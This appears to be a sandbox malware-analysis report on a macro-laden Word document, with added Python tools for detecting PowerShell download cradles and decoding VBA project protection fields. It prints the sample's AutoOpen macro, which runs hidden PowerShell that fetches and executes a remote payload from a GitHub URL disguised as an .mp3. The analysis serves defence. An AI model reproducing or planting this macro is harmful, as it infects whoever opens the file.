                                                                                                  Template:Normal.dotm
                                                                                                  Last Saved By:Admin
                                                                                                  Revision Number:12
                                                                                                  Total Edit Time:420
                                                                                                  Create Time:2021-11-03 22:06:00
                                                                                                  Last Saved Time:2021-11-03 22:17:00
                                                                                                  Number of Pages:1
                                                                                                  Number of Words:10
                                                                                                  Number of Characters:61
                                                                                                  Creating Application:Microsoft Office Word
                                                                                                  Security:0

                                                                                                  Document Summary

                                                                                                  Document Code Page:1251
                                                                                                  Number of Lines:1
                                                                                                  Number of Paragraphs:1
                                                                                                  Thumbnail Scaling Desired:False
                                                                                                  Company:
                                                                                                  Contains Dirty Links:False
                                                                                                  Shared Document:False
                                                                                                  Changed Hyperlinks:False
                                                                                                  Application Version:1048576
                                                                                                  Language:

                                                                                                  Streams with VBA

                                                                                                  VBA File Name: NewMacros.bas, Stream Size: 1428
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/NewMacros
                                                                                                  VBA File Name:NewMacros.bas
                                                                                                  Stream Size:1428
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . [ . . . . . . . . . . . . . . . . z . C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:01 16 03 00 04 f0 00 00 00 1a 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 5b 03 00 00 a3 04 00 00 00 00 00 00 01 00 00 00 ef 7a b0 43 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  VBA Code
                                                                                                  Attribute VB_Name = "NewMacros"
                                                                                                  Sub Autoopen()
                                                                                                      Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
                                                                                                  End Sub
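The macro above is the entire infection chain in this document: an auto-executing procedure (Autoopen runs when the document is opened) calls Shell() on a PowerShell download cradle. The switches are abbreviated (-NoP, -NonI, -W, -Exec are accepted prefixes of -NoProfile, -NonInteractive, -WindowStyle and -ExecutionPolicy), the window is hidden, the execution policy is bypassed, and the second stage is fetched with IEX(New-Object Net.WebClient).DownloadString from a GitHub raw URL that ends in .mp3 to look like media rather than script. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the sample: it extracts Shell() command strings from VBA source, tags them with whether the enclosing procedure auto-executes, resolves abbreviated powershell.exe switches the way the binary does (a prefix of the full name, at least as long as the shortest accepted form), decodes -EncodedCommand when present, and lists the cradle indicators. VBA_SOURCE is the module printed above; ENCODED_SAMPLE, its example.invalid URL and the switch table are constructed assumptions.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed input: the NewMacros module text exactly as this report prints it.
VBA_SOURCE = '''Attribute VB_Name = "NewMacros"
Sub Autoopen()
    Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
End Sub
'''

# Constructed second sample (hypothetical, not from the report): the same kind of cradle
# hidden behind -EncodedCommand, to show decoding happens before the pattern checks.
ENCODED_SAMPLE = "powershell -nop -w hidden -e " + base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.jpg')"
    .encode("utf-16-le")).decode()

# Procedures Word/Excel run on their own when a document is opened or closed.
AUTOEXEC_NAMES = {"autoopen", "auto_open", "document_open", "autoexec", "autonew",
                  "autoclose", "auto_close", "document_close", "workbook_open"}

# powershell.exe switch table (assumed): full name, shortest accepted abbreviation, takes value.
# Any prefix of the full name at least as long as the shortest form is accepted, which is
# why -NoP -NonI -W -Exec in the macro are valid.
PS_SWITCHES = [
    ("NoProfile", "nop", False), ("NonInteractive", "noni", False), ("NoLogo", "nol", False),
    ("NoExit", "noe", False), ("WindowStyle", "w", True), ("ExecutionPolicy", "ex", True),
    ("EncodedCommand", "e", True), ("Command", "c", True), ("File", "f", True),
    ("Sta", "s", False), ("Mta", "mta", False), ("Version", "v", True),
]

CRADLE_PATTERNS = {  # matched case-insensitively against the script part of the command line
    "invoke_expression": r"\b(iex|invoke-expression)\b",
    "webclient": r"new-object\s+(system\.)?net\.webclient",
    "downloadstring": r"\.downloadstring\(",
    "downloadfile": r"\.downloadfile\(",
    "invoke_webrequest": r"\b(iwr|invoke-webrequest|curl|wget)\b",
}
DOWNLOADERS = {"downloadstring", "downloadfile", "invoke_webrequest"}
DECOY_EXTENSIONS = {"mp3", "mp4", "wav", "jpg", "jpeg", "png", "gif", "bmp", "ico", "pdf"}

SUB_RE = re.compile(r"^[ \t]*(?:(?:Public|Private)\s+)?(?:Sub|Function)\s+(\w+)\s*\([^)]*\)"
                    r"(.*?)^[ \t]*End\s+(?:Sub|Function)", re.S | re.M | re.I)
SHELL_RE = re.compile(r'\bShell\s*\(\s*"((?:[^"]|"")*)"', re.I)


def extract_shell_commands(vba_source):
    """Every Shell("...") call in the module, tagged with the procedure that contains it."""
    found = []
    for m in SUB_RE.finditer(vba_source):
        name, body = m.group(1), m.group(2)
        for s in SHELL_RE.finditer(body):
            found.append({"proc": name, "autoexec": name.lower() in AUTOEXEC_NAMES,
                          "command": s.group(1).replace('""', '"')})
    return found


def resolve_switch(token):
    """Map an abbreviated switch (-NoP, -W, -Exec, -e) to (full name, takes_value)."""
    key = token.lstrip("-/").lower()
    for name, shortest, takes_value in PS_SWITCHES:
        if name.lower().startswith(key) and key.startswith(shortest):
            return name, takes_value
    return None, False


def analyze_powershell(cmdline):
    """Normalise switches, recover the script text and list download-cradle indicators."""
    tokens = cmdline.split()
    switches, rest, i = {}, [], 1
    while i < len(tokens):
        tok = tokens[i]
        if rest or tok[0] not in "-/":           # first non-switch token starts the script
            rest.append(tok)
            i += 1
            continue
        name, takes_value = resolve_switch(tok)
        if name == "Command":                    # -Command swallows the rest of the line
            rest.extend(tokens[i + 1:])
            break
        if takes_value and i + 1 < len(tokens):
            switches[name] = tokens[i + 1]
            i += 2
        else:
            switches[name or tok] = True
            i += 1
    script, findings = " ".join(rest), []
    if "EncodedCommand" in switches:             # base64 of UTF-16LE script text
        try:
            script = base64.b64decode(switches["EncodedCommand"]).decode("utf-16-le")
            findings.append("base64 encoded command")
        except (ValueError, UnicodeDecodeError):
            findings.append("undecodable -EncodedCommand")
    if str(switches.get("WindowStyle", "")).lower() == "hidden":
        findings.append("hidden window")
    if str(switches.get("ExecutionPolicy", "")).lower() in {"bypass", "unrestricted"}:
        findings.append("execution policy bypass")
    findings += [k for k in ("NoProfile", "NonInteractive") if k in switches]
    findings += [k for k, pat in CRADLE_PATTERNS.items() if re.search(pat, script, re.I)]
    urls = re.findall(r"https?://[^\s'\"()<>]+", script)
    for url in urls:                             # script fetched under a media-looking name
        leaf = urlparse(url).path.rsplit("/", 1)[-1]
        ext = leaf.rsplit(".", 1)[-1].lower() if "." in leaf else ""
        if ext in DECOY_EXTENSIONS and DOWNLOADERS & set(findings):
            findings.append(f"script fetched under decoy extension .{ext}")
    is_ps = bool(re.fullmatch(r'"?(?:.*[\\/])?(?:powershell|pwsh)(?:\.exe)?"?', tokens[0], re.I))
    return {"is_powershell": is_ps, "switches": switches, "script": script, "urls": urls,
            "findings": findings,
            "is_download_cradle": is_ps and "invoke_expression" in findings
            and bool(DOWNLOADERS & set(findings))}


if __name__ == "__main__":
    for call in extract_shell_commands(VBA_SOURCE):
        print(call["proc"], "auto-executes" if call["autoexec"] else "manual")
        print(analyze_powershell(call["command"]))
```

Switch normalisation matters for detection content: a rule that looks for the literal string "-ExecutionPolicy Bypass" misses this macro, whereas matching on the resolved switch name and value does not.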
                                                                                                  VBA File Name: ThisDocument.cls, Stream Size: 1159
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/ThisDocument
                                                                                                  VBA File Name:ThisDocument.cls
                                                                                                  Stream Size:1159
                                                                                                  Data ASCII:. . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . z . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . m . . ! . N . . . . . . . . D . > . . . I C . . . . . . < . . . . . . . . . . . . . . . . . . . . . 4 Y < O B . < J . . . > . \\ U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . 4 Y < O B . < J . . . > . \\ U . . . m . . ! . N . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:01 16 03 00 06 00 01 00 00 54 03 00 00 e4 00 00 00 ea 01 00 00 82 03 00 00 90 03 00 00 e4 03 00 00 00 00 00 00 01 00 00 00 ef 7a b9 7a 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 d4 99 6d f6 e0 21 c5 4e 9a 91 e1 9f 98 e5 c3 ad 44 9c 3e c5 84 dc 49 43 a3 a3 b7 96 9e 92 3c cf 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  VBA Code
                                                                                                  Attribute VB_Name = "ThisDocument"
                                                                                                  Attribute VB_Base = "1Normal.ThisDocument"
                                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                                  Attribute VB_Creatable = False
                                                                                                  Attribute VB_PredeclaredId = True
                                                                                                  Attribute VB_Exposed = True
                                                                                                  Attribute VB_TemplateDerived = True
                                                                                                  Attribute VB_Customizable = True

                                                                                                  Streams

                                                                                                  Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                  General
                                                                                                  Stream Path:\x1CompObj
                                                                                                  File Type:data
                                                                                                  Stream Size:114
                                                                                                  Entropy:4.42107393569
                                                                                                  Base64 Encoded:True
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 c4 ee ea f3 ec e5 ed f2 20 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                  General
                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                  File Type:data
                                                                                                  Stream Size:4096
                                                                                                  Entropy:0.262838901893
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 0d 00 00 00 01 00 00 00 70 00 00 00 0f 00 00 00 78 00 00 00 1b 00 00 00 84 00 00 00 05 00 00 00 90 00 00 00 06 00 00 00 98 00 00 00 11 00 00 00 a0 00 00 00 17 00 00 00 a8 00 00 00 0b 00 00 00 b0 00 00 00 10 00 00 00 b8 00 00 00
                                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                  General
                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                  File Type:data
                                                                                                  Stream Size:4096
                                                                                                  Entropy:0.460733334731
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A d m i n . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00
                                                                                                  Stream Path: 1Table, File Type: data, Stream Size: 7076
                                                                                                  General
                                                                                                  Stream Path:1Table
                                                                                                  File Type:data
                                                                                                  Stream Size:7076
                                                                                                  Entropy:5.95668538259
                                                                                                  Base64 Encoded:True
                                                                                                  Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                                                  Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                                                  Stream Path: Data, File Type: SysEx File - Garfield, Stream Size: 4096
                                                                                                  General
                                                                                                  Stream Path:Data
                                                                                                  File Type:SysEx File - Garfield (file-signature misidentification: the Data ASCII dump below shows PNG, IHDR and IDAT chunk markers, i.e. an embedded PNG picture in the Word Data stream)
                                                                                                  Stream Size:4096
                                                                                                  Entropy:7.54547746336
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . D . d . . . . . . . . . . . . . . . . . . . . . q 4 : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . C . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . b . . . \\ . . . . . . l . ^ . * c P . G . . . . . . . . 8 . . . . . . . D . . . . . . . . n . . 0 . . . . l . ^ . * c P . G . . . . . . . . P N G . . . . . . . . I H D R . . . . . . . & . . . . . . . . z . . . . I D A T x . . . . .
                                                                                                  Data Raw:f0 0e 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 71 34 3a 02 b8 02 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 40 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 1c 00 00 00 04 41 01 00 00 00 05 c1 04 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 31 00 00 00
                                                                                                  Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 410
                                                                                                  General
                                                                                                  Stream Path:Macros/PROJECT
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Stream Size:410
                                                                                                  Entropy:5.39100661112
                                                                                                  Base64 Encoded:True
                                                                                                  Data ASCII:I D = " { 1 4 7 7 3 D 1 2 - 3 6 E D - 4 9 7 4 - A 2 7 E - 6 C 6 3 B 7 A 5 4 1 1 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 0 4 2 E 9 E F E D E F E D E F E D E F E D " . . D P B = " 9 C 9 E 3 5 1 B C D 7 6 C E 7 6 C E 7 6 " . . G C = " F 8 F A 5 1 A 2 5 2 A 2 5 2 5 D " . . . . [ H o s t E x
                                                                                                  Data Raw:49 44 3d 22 7b 31 34 37 37 33 44 31 32 2d 33 36 45 44 2d 34 39 37 34 2d 41 32 37 45 2d 36 43 36 33 42 37 41 35 34 31 31 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 61 63 72 6f 73 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22
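CMG, DPB and GC in the PROJECT stream are the project protection state, the project password and the VBE visibility state. Each is stored with the MS-OVBA "Data Encryption" scheme (section 2.4.3 of the spec), a seed-keyed XOR chain that is obfuscation rather than encryption. The Python below is an added example for this page, not part of the Joe Sandbox report: it parses the property lines shown in the dump above (the dump is cut off after the GC line, so the constructed input stops there too) and decrypts the three fields. Every field must decrypt with the same recovered project key, which doubles as a check that the stream has not been hand-edited. For this sample DPB decrypts to a single 0x00 byte (no password), CMG to four zero bytes (no user, host or VBE protection) and GC to 0xFF (project visible). A VBA password only gates the VBE editor: module source is stored in the module streams, compressed but unencrypted, so macro extraction like the VBA Code listing above works regardless of the password.

```python
# Constructed input: the Macros/PROJECT stream as this report's Data ASCII dump shows it.
# The page's dump is truncated after the GC line, so the sample ends there as well.
PROJECT_STREAM = (
    'ID="{14773D12-36ED-4974-A27E-6C63B7A54110}"\r\n'
    'Document=ThisDocument/&H00000000\r\n'
    'Module=NewMacros\r\n'
    'Name="Project"\r\n'
    'HelpContextID="0"\r\n'
    'VersionCompatible32="393222000"\r\n'
    'CMG="4042E9EFEDEFEDEFEDEFED"\r\n'
    'DPB="9C9E351BCD76CE76CE76"\r\n'
    'GC="F8FA51A252A2525D"\r\n'
)


def parse_project_stream(text):
    """Key=value properties that precede the first [section] header (keys may repeat)."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            break
        if "=" in line:
            key, _, value = line.partition("=")
            props.setdefault(key.strip(), []).append(value.strip().strip('"'))
    return props


def ovba_decrypt(hex_value):
    """MS-OVBA Data Encryption, decryption direction.

    Layout: Seed, VersionEnc, ProjKeyEnc, IgnoredEnc[(Seed & 6) / 2], LengthEnc[4], DataEnc[Length].
    Every byte after the first three is XORed with (encrypted byte two positions back +
    previous plaintext byte) mod 256. Returns (project_key, plaintext_data).
    """
    data = bytes.fromhex(hex_value)
    seed = data[0]
    if seed ^ data[1] != 2:
        raise ValueError("unsupported Data Encryption version")
    proj_key = seed ^ data[2]
    ignored = (seed & 6) >> 1
    prev_plain, enc1, enc2 = proj_key, data[2], data[1]
    plain = bytearray()
    for enc in data[3:]:
        byte = enc ^ ((enc2 + prev_plain) & 0xFF)
        enc2, enc1, prev_plain = enc1, enc, byte
        plain.append(byte)
    body = bytes(plain[ignored:])
    if len(body) < 4:
        raise ValueError("truncated field")
    length = int.from_bytes(body[:4], "little")
    payload = body[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated field")
    return proj_key, payload


def project_protection(props):
    """Decode CMG (ProjectProtectionState), DPB (ProjectPassword), GC (ProjectVisibilityState)."""
    key_cmg, state = ovba_decrypt(props["CMG"][0])
    key_dpb, password = ovba_decrypt(props["DPB"][0])
    key_gc, visibility = ovba_decrypt(props["GC"][0])
    if not key_cmg == key_dpb == key_gc:
        raise ValueError("project key differs between fields; stream damaged or hand-edited")
    flags = int.from_bytes(state, "little")
    if password == b"\x00":
        kind = "none"                         # PasswordNone: single 0x00 byte
    elif password[:1] == b"\xff":
        kind = "hashed"                       # PasswordHash: 0xFF reserved byte first
    else:
        kind = "plain"                        # PasswordPlain: legacy clear-text form
    return {
        "project_key": key_cmg,
        "user_protected": bool(flags & 1),    # fUserProtected
        "host_protected": bool(flags & 2),    # fHostProtected
        "vbe_protected": bool(flags & 4),     # fVBEProtected
        "password": kind,
        "visible": visibility == b"\xff",     # 0xFF visible in the VBE, 0x00 hidden
    }


if __name__ == "__main__":
    print(project_protection(parse_project_stream(PROJECT_STREAM)))
```

The 0xA9 project key recovered from all three fields, and the decrypted lengths (1, 4 and 1 bytes) matching the structure sizes the spec defines for those fields, are what confirm the decryption is right on this sample.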
                                                                                                  Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71
                                                                                                  General
                                                                                                  Stream Path:Macros/PROJECTwm
                                                                                                  File Type:data
                                                                                                  Stream Size:71
                                                                                                  Entropy:3.34859995248
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . .
                                                                                                  Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 77 4d 61 63 72 6f 73 00 4e 00 65 00 77 00 4d 00 61 00 63 00 72 00 6f 00 73 00 00 00 00 00
                                                                                                  Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2597
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                                  File Type:data
                                                                                                  Stream Size:2597
                                                                                                  Entropy:4.06864016648
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                                                                                  Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                  Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 2013
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/__SRP_0
                                                                                                  File Type:data
                                                                                                  Stream Size:2013
                                                                                                  Entropy:3.60393793372
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ L . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00
                                                                                                  Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 186
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/__SRP_1
                                                                                                  File Type:data
                                                                                                  Stream Size:186
                                                                                                  Entropy:1.60078147632
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 11 00 00 00 00 00 00 00 00 00 05 00 06 00
                                                                                                  Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 348
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/__SRP_2
                                                                                                  File Type:data
                                                                                                  Stream Size:348
                                                                                                  Entropy:1.78667786328
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
                                                                                                  Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 106
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/__SRP_3
                                                                                                  File Type:data
                                                                                                  Stream Size:106
                                                                                                  Entropy:1.35911194617
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00
                                                                                                  Stream Path: Macros/VBA/__SRP_4, File Type: data, Stream Size: 347
                                                                                                  General
